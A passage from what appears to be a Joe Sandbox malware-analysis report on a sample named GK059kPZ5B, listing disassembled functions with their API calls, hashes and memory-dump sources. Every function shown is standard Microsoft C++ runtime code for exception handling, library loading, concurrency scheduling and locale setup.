                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$MoveUpdate
                                                            • String ID:
                                                            • API String ID: 1339878773-0
                                                            • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                            • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                            • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                            • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                            Function 004290E9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                              • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                              • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                            • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                            Function 00A79350 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00A7936A
                                                              • Part of subcall function 00A792B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A792E6
                                                              • Part of subcall function 00A792B7: ___AdjustPointer.LIBCMT ref: 00A79301
                                                            • _UnwindNestedFrames.LIBCMT ref: 00A7937F
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A79390
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00A793B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction ID: a42a3e184c552ce00f430dc8c22513b25c9edca5093842fdf18833f6855a6c65
                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction Fuzzy Hash: E6010572100148BBDF126F958D41EEB3B69EF98754F04C019FE0C5A121D732E861EBA0
                                                            Function 00434F4F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                            • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                            Function 00A851B6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378), ref: 00A851E8
                                                            • GetLastError.KERNEL32(?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00A82233), ref: 00A851F4
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378,0044A370,0044A378,00000000), ref: 00A85202
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction ID: 464d7c8ef40f1b154eae3e4fb03b03a96279052b72c8a0b4c09df81ff4e43da0
                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction Fuzzy Hash: 9E01D03AE516226BC7216F79AC44A97BBA8FF46F61B210630FD05D7141EB20DD01CBE4
                                                            Function 0042614E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                            • String ID:
                                                            • API String ID: 78362717-0
                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                            Function 00A763B5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A763CF
                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A763E3
                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A763FB
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A76413
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                            • String ID:
                                                            • API String ID: 78362717-0
                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction ID: c7a65a07c125b6b223b09ab22836c3889893043d6064aaf1adcfd28626daa795
                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction Fuzzy Hash: 6E01D632600924ABCF16AF94CE41BEF77ADEF94750F00C055FD19AB282DA70ED0196E0
                                                            Function 00A72BA2 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A72BD1
                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A72BEF
                                                              • Part of subcall function 00A686A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00A686C8
                                                              • Part of subcall function 00A686A7: Hash.LIBCMT ref: 00A68708
                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A72BF8
                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A72C18
                                                              • Part of subcall function 00A6F6FF: Hash.LIBCMT ref: 00A6F711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                            • String ID:
                                                            • API String ID: 2250070497-0
                                                            • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                            • Instruction ID: 7d13cb182de9dd532b2affb5017abd5aa671deb966c29e0720d16dec4bf5549c
                                                            • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                            • Instruction Fuzzy Hash: 71118E76400600AFC715DF64C981ACAF7F8FF19310F008A1EE55A87252DB70F904CB50
                                                            Function 00A72BB1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A72BD1
                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A72BEF
                                                              • Part of subcall function 00A686A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00A686C8
                                                              • Part of subcall function 00A686A7: Hash.LIBCMT ref: 00A68708
                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A72BF8
                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A72C18
                                                              • Part of subcall function 00A6F6FF: Hash.LIBCMT ref: 00A6F711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                            • String ID:
                                                            • API String ID: 2250070497-0
                                                            • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                            • Instruction ID: 3180dc8ef030f8066b633fba1b741bdae7558639f0499b7962b3a6fe9d623086
                                                            • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                            • Instruction Fuzzy Hash: 28016976400604ABC715DFA5C982EDAF7F8FF58310F108A2EE55A87251DB70F904CB60
                                                            Function 00405944 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                              • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                            • __Getcoll.LIBCPMT ref: 004059A5
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                            • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                            • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                            • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                            Function 00404E88 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                              • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                            • __Getcoll.LIBCPMT ref: 00404EE9
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                            • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                            • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                            • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                            Function 00A550EF Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A550F6
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55141
                                                            • __Getcoll.LIBCPMT ref: 00A55150
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55160
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                            • Instruction ID: 69c01fe7d8e2c01a304abae2730078833d4c2947d7d5c4d673f2d9d078e588a3
                                                            • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                            • Instruction Fuzzy Hash: 1E015E71D10708DFDB04EFA4C551BDEBBB0BF44362F108529E855AB242DBB89A88CB91
                                                            Function 00A55BAB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A55BB2
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55BFD
                                                            • __Getcoll.LIBCPMT ref: 00A55C0C
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55C1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                            • Instruction ID: 1f1cfb2072103595cfadb6aa5e0bb833256cb150985d432eec1935249c2a0134
                                                            • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                            • Instruction Fuzzy Hash: 4D017171D10708DFDB04EFA4C651BDDBBB0FF04322F508429E845AB242DBB99988CB90
                                                            Function 0041BEF7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Compare_exchange_acquire_4std::_
                                                            • String ID:
                                                            • API String ID: 3973403980-0
                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                            Function 00A6C15E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C190
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1A0
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1B0
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Compare_exchange_acquire_4std::_
                                                            • String ID:
                                                            • API String ID: 3973403980-0
                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction ID: fe18e884b356ab6fbd7a388d351c741e4aa89bf9a96e129bbca4db24fc950cc3
                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction Fuzzy Hash: 5A013C7B004109ABCF129F94DD068BD3B36FF06370F148512F99884072D732C670AB82
                                                            Function 0040D244 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                              • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                              • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                            • String ID:
                                                            • API String ID: 4284812201-0
                                                            • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                            • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                            • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                            • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                            Function 0041352C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                              • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                              • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                            • GetLastError.KERNEL32 ref: 00413561
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                              • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                            • String ID:
                                                            • API String ID: 1674182817-0
                                                            • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                            • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                            Function 00A5D4AB Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00A61362
                                                              • Part of subcall function 00A60BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A60BF6
                                                              • Part of subcall function 00A60BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A60C17
                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A61375
                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00A61381
                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00A6138A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                            • String ID:
                                                            • API String ID: 4284812201-0
                                                            • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                            • Instruction ID: a913a714bd766165e29504057cbf1f6d47d9ebe8291eb4947c3dc39b805daae7
                                                            • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                            • Instruction Fuzzy Hash: 6BF0E931644708679F54BBB409529BF36B65F50310F584179B5126F3C1DE744D4593D4
                                                            Function 00A63793 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00A637AC
                                                              • Part of subcall function 00A62B36: ___crtGetTimeFormatEx.LIBCMT ref: 00A62B4C
                                                              • Part of subcall function 00A62B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A62B6B
                                                            • GetLastError.KERNEL32 ref: 00A637C8
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A637DE
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A637EC
                                                              • Part of subcall function 00A6290C: SetThreadPriority.KERNEL32(?,?), ref: 00A62918
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                            • String ID:
                                                            • API String ID: 1674182817-0
                                                            • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction ID: b255409e9fdfd35d6b3ff1a3e5f114af788c8ad662cefb4721a0ee65a1e12486
                                                            • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction Fuzzy Hash: EDF0A7B2A4031939E720F7754D0BFBB36ACDB01751F50482AB915E60C2ED99D40086B9
                                                            Function 00A6D094 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A6D0A8
                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A6D0CC
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6D0DF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6D0ED
                                                            Memory Dump Source
